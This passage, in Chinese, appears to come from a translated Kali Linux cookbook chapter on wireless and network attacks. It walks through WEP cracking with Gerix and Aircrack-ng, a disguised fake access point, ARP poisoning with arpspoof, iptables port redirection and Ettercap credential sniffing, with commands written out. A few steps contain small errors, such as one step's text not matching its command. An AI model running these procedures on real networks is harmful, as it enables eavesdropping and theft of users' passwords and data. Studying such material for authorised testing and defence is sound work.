  8. 点击Enable/Disable Monitor Mode(开启/停止监控器模式)按钮。

  9. 在监控模式启动之后,在Select Target Network(选择目标网络)下面,点击Rescan Networks(重新扫描网络)按钮。

  10. 目标网络的列表会填满。选择无线网络作为目标。这里,我们选择了 WEP 加密的网络。

  11. 点击 WEP 标签页。

  12. Functionalities(功能)中,点击Start Sniffing and Logging(开启嗅探和记录)按钮。

  13. 点击 WEP Attacks (No Client)(WEP 攻击 无客户端)子标签页。

  14. 点击Start false access point authentication on victim(开启目标上的伪造接入点验证)按钮。

  15. 点击Start the ChopChop attack(开始断续攻击)按钮。

  16. 在打开的终端窗口中,对Use this packet(使用这个封包)问题回答Y

  17. 完成之后,复制生成的.cap文件。

  18. 点击Create the ARP packet to be injected on the victim access point(创建注入到目标接入点的 ARP 封包)按钮。

  19. 点击Inject the created packet on victim access point(将创建的封包注入到目标接入点)按钮。

  20. 在打开的终端窗口中,对Use this packet问题回答Y

  21. 收集了大约 20000 个封包之后,点击Cracking(破解)标签页。

  22. 点击Aircrack-ng – Decrypt WEP Password(解密 WEP 密码)按钮。

    这就结束了。

工作原理

这个秘籍中,我们使用了 Gerix 来自动化破解无线网络,为获得 WEP 密码。我们以启动 Gerix 并开启监控模式接口来开始这个秘籍。下面,我们从由 Gerix 提供的攻击目标的列表中选择我们的目标。在我们开始嗅探网络流量之后,我们使用 Chop Chop 来生成 CAP 文件。我们最后以收集 20000 个封包并使用 AirCrack 暴力破解 CAP 文件来结束这个秘籍。

使用 Gerix,我们能够自动化破解 WEP 密码的步骤,而不需要手动在终端窗口中键入命令。这是一种非常棒的方式,能够快速高效地破解 WEP 加密的网络。

9.4 使用伪造接入点连接客户端

这个秘籍中,我们会使用 Gerix 来创建并设置伪造接入点(AP)。建立伪造接入点让我们能够收集每个连接它的计算机的信息。人们通常会为了便利而牺牲安全。连接到开放无线接入点并发送简短的电子邮件,或登录到社交网络中非常方便。Gerix 是 AirCrack 的自动化 GUI。

准备

为了执行这个秘籍中的任务,需要Kali 终端窗口的经验。也需要受支持的配置好的无线网卡,用于封包注入。在无线网卡的例子中,封包注入涉及到发送封包,或将它注入到双方已经建立的连接中。

操作步骤

让我们开始使用 Gerix 创建伪造的 AP。

  1. 让我们访问 Gerix 所在的目录:

    cd /usr/share/gerix-wifi-cracker
  2. 键入下面的命令来使用 Gerix:

    python gerix.py

  3. 点击Configuration(配置)标签页。

  4. Configuration标签页中,选择你的无线接口。

  5. 点击Enable/Disable Monitor Mode(开启/停止监控器模式)按钮。

  6. 在监控模式启动之后,在Select Target Network(选择目标网络)下面,点击Rescan Networks(重新扫描网络)按钮。

  7. 目标网络的列表会填满。选择无线网络作为目标。这里,我们选择了 WEP 加密的网络。

  8. 点击Fake AP(伪造接入点)标签页。

  9. 修改Access Point ESSID(接入点 ESSID),将其从honeypot修改为不会引起怀疑的名称。这里我们使用personalnetwork

  10. 其它选项使用默认。为了开启伪造接入点,点击Start Face Access Point(开启伪造接入点)按钮。

    这就结束了。

工作原理

这个秘籍中,我们使用了 Gerix 来创建伪造接入点。创建伪造接入点是一个非常好的方式,来收集没有防备用户的信息。原因是,对于受害者来说,它们表现为正常的接入点,所欲会使它被用户信任。使用 Gerix,我们可以只通过几次点击来自动化创建和设置伪造接入点。

9.5 URL 流量操纵

这个秘籍中,我们会进行 URL 流量操纵攻击。URL 流量操纵非常类似于中间人攻击,因为我们会让去往互联网的流量首先通过我们的机器。我们使用 ARP 毒化来执行这个攻击。ARP 毒化是一种技巧,让我们能够在局域网中发送欺骗性的 ARP 信息给受害者。我们会使用 arpspoof 来执行这个秘籍。

操作步骤

让我们开始进行 URL 流量操纵。

  1. 打开终端窗口并执行下面的命令,来配置 IP 表使我们能够劫持流量:

    sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
  2. 下面,我们启动 arpspoof 来毒化从受害者主机到默认网关的流量。这个例子中,我们在局域网中使用 Windows 7 主机,地址为192.168.10.115。Arpspoof 有一些选项,包括:

    • -i允许我们选择目标接口。这里我们选择wlan0
    • -t允许我们指定目标。

    整个命令的语法是arpspoof –i [interface] –t [target IP address] [destination IP address]

    sudo arpspoof –i wlan0 -t 192.168.10.115 192.168.10.1
  3. 接着,我们执行另一个 arpspoof 命令,它会从上一个命令的目的地(这里是默认网关)取回流量,并使流量经过我们的 Kali 主机。这个例子中,我们的 IP 地址是192.168.10.110

    sudo arpspoof –i wlan0 -t 192.168.10.1 192.168.10.110 

    这就结束了。

工作原理

这个秘籍中,我们使用 arpspoof 通过 ARP 毒化来操纵受害者主机到路由器之间的流量,使其通过我们的 Kali 主机。一旦流量被重定向,我们就可以对受害者执行其它攻击,包括记录键盘操作,跟踪浏览的网站,以及更多。

9.6 端口重定向

这个秘籍中,我们使用 Kali 来进行端口重定向,也叫做端口转发或端口映射。端口重定向涉及到接收发往某个端口,比如 80 的数据包,并把它重定向到不同的端口上,比如 8080。执行这类攻击的好处很多,因为你可以将安全的端口重定向为非安全的端口,或者将流量重定向到特定的设备的特定端口,以及其它。

操作步骤

让我们开始进行端口重定向/转发。

  1. 打开终端窗口并执行下列命令来配置 IP 表,使我们能够劫持流量:

    Sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
  2. 下面,我们启动 arpspoof 来毒化去往默认网关的流量。这个例子中,默认网关的 IP 地址为 192.168.10.1。Arpspoof 有一些选项,包括:

    • -i允许我们选择目标接口。这里我们选择wlan0

    整个命令的语法是arpspoof –i [interface] [destination IP address]

    sudo arpspoof –i wlan0 192.168.10.1
  3. 接着,我们执行另一个 arpspoof 命令,它会从上一个命令的目的地(这里是默认网关)取回流量,并使流量经过我们的 Kali 主机。这个例子中,我们的 IP 地址是192.168.10.110

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    这就结束了。

工作原理

这个秘籍中,我们使用 arpspoof 通过 ARP 毒化和 IPTables 路由,将网络上发到端口 80 的流量重定向到 8080。执行这类攻击的好处很多,因为你可以将安全的端口重定向为非安全的端口,或者将流量重定向到特定的设备的特定端口,以及其它。

9.7 嗅探网络流量

这个秘籍中,我们会实验网络流量的嗅探。网络流量嗅探涉及到拦截网络封包,分析它们,之后将流量解码(如果需要)来展示封包中的信息。流量嗅探特别在目标的信息收集中非常有用,因为取决于所浏览的网站,你可以看见所浏览的网址、用户名、密码和其它可以利用的信息。

我们在这个秘籍中会使用 Ettercap ,但是你也可以使用 Wireshark。处于展示目的,Ettercap 更加易于理解以及应用嗅探原理。一旦建立起对嗅探过程的理解,你可以使用 Wireshark 来进行更详细的分析。

准备

这个秘籍需要为封包注入配置好的无线网卡,虽然你可以在有线网络上执行相同步骤。在无线网卡的情况下,封包注入涉及到将封包发送或注入到双方已经建立的连接中。

操作步骤

让我们启动 Ettercap 来开始网络流量的嗅探。

  1. 打开终端窗口并启动 Ettercap。使用-G选项加载 GUI:

    ettercap –G

  2. 我们以打开Unified sniffing(统一嗅探)开始。你可以按下Shift + U或者访问菜单中的Sniff | Unified sniffing

  3. 选择网络接口。在发起 MITM 攻击的情况中,我们应该选项我们的无线接口。

  4. 下面,我们打开Scan for hosts(扫描主机)。可以通过按下Ctrl + S或访问菜单栏的Hosts | Scan for hosts来完成。

  5. 下面,我们得到了Host List(主机列表)。你可以按下H或者访问菜单栏的Hosts | Host List

  6. 我们下面需要选择或设置我们的目标。在我们的例子中,我们选择192.168.10.111作为我们的Target 1,通过选中它的 IP 地址并按下Add To Target 1(添加到目标 1)按钮。

  7. 现在我们能够让 Ettercap 开始嗅探了。你可以按下Ctrl + W或访问菜单栏的Start | Start sniffing

  8. 最后,我们开始进行 ARP 毒化。访问菜单栏的Mitm | Arp poisoning

  9. 在出现的窗口中,选中Sniff remote connections(嗅探远程连接)的选项。

  10. 取决于网络环境,我们会看到信息。

  11. 一旦我们找到了想要找的信息(用户名和密码)。我们可以关闭 Ettercap。你可以按下Ctrl + E或访问菜单栏的Start | Stop sniffing来完成它。

  12. 现在我们关闭 ARP 毒化,使网络恢复正常。

工作原理

这个秘籍包括了 MITM 攻击,它通过 ARP 毒化来窃听由用户发送的无线网络通信。我们以启动 Ettercap 并扫描主机来开始这个秘籍。之后我们开始进行网络的 ARP 毒化。ARP 毒化是一种技巧,允许你发送伪造的 ARP 信息给局域网内的受害者。

我们以启动封包嗅探并停止 ARP 毒化让网络恢复正常来结束。这个步骤在侦测过程中很关键,因为在你停止毒化网络时,它让网络不会崩溃。

这个过程对于信息收集很有用,因为它能收集到网络上传输的信息。取决于网络环境,你可以收集到用户名、密码、银行账户详情,以及其它你的目标在网络上发送的信息。这些信息也可以用于更大型攻击的跳板。